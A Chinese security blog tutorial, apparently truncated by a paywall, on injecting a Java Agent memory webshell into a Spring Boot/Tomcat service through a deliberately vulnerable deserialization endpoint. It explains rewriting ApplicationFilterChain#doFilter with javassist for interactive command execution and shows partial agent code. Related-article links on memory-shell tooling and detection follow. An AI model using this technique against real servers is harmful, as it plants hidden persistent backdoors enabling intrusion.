构造agent类型的内存马(内存马系列篇十三)

最新推荐文章于 2025-02-10 15:32:20 发布
最新推荐文章于 2025-02-10 15:32:20 发布
阅读量793 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: java spring mybatis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/text2207/article/details/129169152
本文介绍了如何利用JAVA Agent技术构建内存马,通过Springboot搭建漏洞环境,演示了利用反序列化漏洞注入内存马的过程。文章详细阐述了编写agent.jar、序列化数据的编写以及注入演示的步骤,涉及字节码修改和命令执行逻辑,是内存马系列的第十三篇。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

写在前面

前面我们对JAVA中的Agent技术进行了简单的学习,学习前面的Agent技术是为了给这篇Agent内存马的实现做出铺垫,接下来我们就来看看Agent内存马的实现。

这是内存马系列篇的第十三篇了。

环境搭建

我这里就使用Springboot来搭建一个简单的漏洞环境,对于agent内存马的注入,我这里搭建的是一个具有明显的反序列化漏洞的web服务,通过反序列化漏洞来进行内存马的注入,

IDEA新建一个springboot项目

漏洞代码:

package com.roboterh.vuln.controller;

import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.ResponseBody;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.io.ObjectInputStream;

@Controller
public class CommonsCollectionsVuln {
    @ResponseBody
    @RequestMapping("/unser")
    public void unserialize(HttpServletRequest request, HttpServletResponse response) throws Exception {
        java.io.InputStream inputStream =  request.getInputStream();
        ObjectInputStream objectInputStream = new ObjectInputStream(inputStream);
        objectInputStream.readObject();
        response.getWriter().println("successfully!!!");
    }

    @ResponseBody
    @RequestMapping("/demo")
    public void demo(HttpServletRequest request, HttpServletResponse response) throws Exception{
        response.getWriter().println("This is a Demo!!!");
    }
}

/unser路由中,获取了请求体的序列化数据,进行反序列化调用;

/demo路由中,返回了一个字符串;

我打算的是通过CC链进行写入。

添加依赖。

<dependency>
    <groupId>commons-collections</groupId>
    <artifactId>commons-collections</artifactId>
    <version>3.2.1</version>
</dependency>

正式注入

编写agent.jar

有了前面的知识,我们知道在一个运行中的web服务中,对于premain方法的调用方式不太适用,更实用的是通过agentmain方法的调用。

在通过内置的Attach API进行加载之后将会调用这个方法进行动态修改字节码,所以如果我们能够在该方法中实现我们的恶意逻辑,就能够达到我们的目的。

但是怎么才能注入内存马使得能够与用户请求进行交互式的命令执行捏?这里我们是通过类似于前面提到过的在Tomcat
Filter内存马类似的思想,通过利用org.apache.catalina.core.ApplicationFilterChain#doFilter方法。

只是对于前面所提到的Filter型内存马的实现主要是通过动态添加了一个过滤器,通过配置特定的路由和调用对应的doFilter方法进行利用。

这里我们注入agent内存马主要是通过使用前面基础部分讲过的通过javassist框架进行修改doFilter方法的字节码。

非常友好的是在doFilter方法中存在有ServletRequest / ServletResponse实例,可以直接和请求进行交互。

image-20221020210332062.png

好了,接下来看看实现,我们可以简化为以下关键的几步:

  1. 通过addTransformer方法的调用来添加一个实现了java.lang.instrument.ClassFileTransformer接口的一个类。
    image-20221020210557192.png

  2. 之后通过调用retransformClasses方法,来触发前面添加的转换器的transform方法来修改传入的类的对应方法的字节码。

image-20221020210646261.png

首先是一个存在有agentmain方法的AgentDemo类。

import java.lang.instrument.Instrumentation;

public class AgentDemo {
    public static final String ClassName = "org.apache.catalina.core.ApplicationFilterChain";

    public static void agentmain(String agentArgs, Instrumentation inst) {
        inst.addTransformer(new TransformerDemo(), true);
        Class[] allLoadedClasses = inst.getAllLoadedClasses();
        for (Class aClass : allLoadedClasses) {
            if (aClass.getName().equals(ClassName)) {
                System.out
最低0.47元/天 解锁文章

200万优质内容无限畅学
Jinmindong
关注
Java Tomcat内存——filter内存
m0_61506558的博客
11-17 779
至此,invoke()部分的所有流程我们都分析完毕了,接着继续往上看,也就是doFilter()方法。这个doFilter()方法也是由最近的那个invoke()方法调用的。如图,我们把断点下过去。如果师傅们这个invoke()方法可用的话,可以断点下这里,如果不可用的话可以下到后面doFilter()方法。这里我们要重点关注前文说过的这个变量,那它是什么呢?我们跟进这个方法。使用创建了一个过滤链,将进行传递。我们在方法走一下流程。
[系统安全] 五十八.恶意软件分析 (10)利用火绒安全实现恶意样本家族批量标注(含学术探讨)
杨秀璋的专栏
04-26 854
前文介绍了利用MS Defender实现恶意样本家族批量标注。这文章将讲解如何利用火绒实现恶意样本家族批量标注,在通过VS、VT采集批量样本后,通常需要样本家族标注,如何准确识别家族类别至关重要,其将为后续的恶意软件家族分类或溯源提供帮助。在此感谢李师弟热心的指导和帮助,基础性基础,希望您喜欢,且看且珍惜。
Java Agent内存调试系列 ()——反序列化注入agent
热门推荐
leeezp的博客
10-28 30万+
实战中通过反序列化环境一步到位注入内存,相比于之前介绍的agent或filter内存需要上传文件到服务器,反序列化的好处是真正的无文件,只需要发一个包。
[Java安全]—Agent内存
Sentiment的博客
08-17 4201
在JVM中运行中,类是通过classLoader加载.class文件进行生成的。在类加载.class文件生成对应的类对象之前,我们可以通过修改.class文件内容,达到修改类的目的。而在 jdk 1.5之后引入了 java.lang.instrument 包,通过 java.lang.instrument 提供的对字节码进行操作的一系列api,而使用这些api开发出的程序就可以称之为java agentagent内存就是利用上述特性修改特定的类或者方法,从而实现恶意方法的注入。Ja...
Java内存简单实现
派大星的博客
12-04 2727
Java内存
Godzilla内存生成插件-Godzilla-Suo5MemShell
SuperherRo的博客
09-04 3089
Godzilla 插件: 一键注入 Suo5 内存
Java Agent内存调试系列 ()
leeezp的博客
10-17 27万+
在JDK1.5以后,引入了包,该包提供了检测 java 程序的 Api,比如用于监控、收集性能信息、诊断问题,通过 java.lang.instrument。在 Instrumentation 中增加了名叫 transformer 的 Class 文件转换器,转换器可以改变二进制流的数据Transformer 可以对未加载的类进行拦截,同时可对已加载的类进行重新拦截,所以根据这个特性我们能够在不影响正常编译的情况实现动态修改字节码,已加载或者未加载的类,包括类的属性、方法。
Java内存攻防实战——攻击基础
JavaMonsterr的博客
05-23 3572
在红蓝对抗中,攻击方广泛应用webshell等技术在防守方提供的服务中植入后门,防守方也发展出各种技术来应对攻击,传统的落地型webshell很容易被攻击方检测和绞杀。而内存技术则是通过在运行的服务中直接插入运行攻击者的webshell逻辑,利用中间件的进程执行某些恶意代码,而不依赖实体文件的存在实现的服务后门,因此具有更好的隐蔽性,也更容易躲避传统安全监测设备的检测。 本文以Java语言为基础讨论内存技术的攻防,分为两个章,分别是攻击基础和防护应用。本攻击基础介绍了Java Servlet
Java Agent 内存攻防
顶峰
02-03 1336
在 jdk 1.5 之后引入了 java.lang.instrument 包,该包提供了检测 java 程序的Api,用于监控、收集性能信息、诊断问题等。通过 java.lang.instrument 实现的工具我们称之为 Java AgentJavaAgent 能够在不影响正常编译的情况下来修改字节码,即动态修改已加载或者未加载的类,包括类的属性、方法等。premain方法,在JVM启动前加载。agentmain方法,在JVM启动后加载。
Java Agent内存
google20的博客
12-25 1080
java Agent内存
Java 内存生成工具-java-memshell-generator-release
SuperherRo的博客
09-04 2420
jMG (Java Memshell Generator) 是一款支持高度自定义的 Java 内存生成工具,提供常见中间件的内存注入支持。
基于Java Agent内存
遇事不决冲冲冲
06-06 2268
在 jdk 1.5 之后引入了 `java.lang.instrument` 包,该包提供了检测 java 程序的 Api,比如用于监控、收集性能信息、诊断问题,通过 `java.lang.instrument` 实现的工具我们称之为 Java AgentJava Agent 支持两种方式进行加载: 实现 premain 方法,在启动时进行加载 (该特性在 jdk 1.5 之后才有) 实现 agentmain 方法,在启动后进行加载 (该特性在 jdk 1.6 之后才有) ...
【网络安全】Agent内存的自动分析与查杀
qkh1234567的博客
05-20 1074
以上是背景,接下来介绍我做了些什么,能够实现怎样的效果不难看出,以上内存查杀手段都是半自动结合人工审核的方式,当检测出内存后检测(同时支持普通内存Java Agent内存的检测)分析(如何确定该类是内存,仅根据恶意类名和注解等信息不完善)查杀(当确定内存存在,如何自动地删除内存并恢复正常业务逻辑)大致看来,实现起来似乎不难,然而实际中遇到了很多坑,接下来我会逐个介绍关于Dump字节码经过我的一些测试,使用sa-jdi库不能保证dump。
java agent内存学习
Shanfenglan's blog
11-12 2150
文章目录1. 什么是java agent补充:一些重要的类ClassFileTransformerVirtualMachineCtMethod2. 利用premain函数实现java agent2.1 执行逻辑2.2 利用javaagent修改加载到jvm前被拦截的类3. 利用agentmain实现javaagent3.1 执行逻辑3.2 参考代码1. 实现连接指定jvm进程的代码:2. 实现agentmain4. 利用agentmain实现内存4.1 修改spring boot中的Filter实现内存
【渗透测试笔记】之【拒绝服务攻击】_拒绝服务攻击的代码(1)
2401_84971562的博客
05-13 605
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
JAVA安全之Java Agent内存
最新发布
2401_83799022的博客
02-10 1470
Java Agent是一种特殊的Java程序,它允许开发者在Java虚拟机(JVM)启动时或运行期间通过java.lang.instrument包提供的Java标准接口进行代码插桩,从而实现在Java应用程序类加载和运行期间动态修改已加载或者未加载的类,包括类的属性、方法等,而Java Agent内存的实现便是利用了这一特性使其动态修改特定类的特定方法将我们的恶意方法添加进去java.lang.instrument.Instrumentation提供了用于监测运行在JVM中的Java API。
实战分享!spring内存(Controller)构造
MachineGunJoe666
07-05 1048
也不行,再换种方法。这里可以写到一个类中,之前那个相当于两个类,一个主类其中嵌套内部类,再进行build之后,可以看到会生成两个类,因为java中的内部类只是java编译器的概念,对于java的虚拟机而言,它是没有java内部类的概念的,也就是说java中的内部类最后也会被编译成一个独立的class文件。再看第一个参数patterns的构造函数,PatternsRequestCondition是路径匹配,也就是定义访问 controller 的 URL 地址,那么这里写url。
学习Java agent 内存(看不懂别关闭,直接喷!!!)
一剑开天门!的博客
12-23 3649
java agentJava 程序,可以通过在 Java 虚拟机(JVM)启动时提供参数来加载和运行。它可以通过 java.lang.instrument 包提供的 Java 标准接口进行代码插桩,从而在 Java 应用程序的类加载和运行期间改变 Java 字节码。而java agent内存就是利用这个特性产生。
探秘Java Memshell Generator:你的高级定制内存神器
gitblog_00035的博客
06-13 898
探秘Java Memshell Generator:你的高级定制内存神器 去发现同类优质开源项目:https://gitcode.com/ 在复杂多变的信息安全领域,每一种工具都扮演着不可或缺的角色。今天,我们为您介绍的是一个强大且高度自定义的开源工具——Java Memshell Generator(简称jMG)。这个工具为安全研究者们打开了一扇新的大门,尤其对于那些深入研究Java应用安全的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值